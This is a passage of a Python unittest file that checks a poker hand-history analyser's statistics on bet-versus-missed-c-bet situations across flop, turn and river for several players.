self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
file = 'b11.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('fold', tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.enum_raise_raise_def(),
msg=file + ' ' + street + ' ' + player)
class TestBVsMCbet(unittest.TestCase):
def test_b_vs_mcb_opp(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCC__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb_def_opp(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
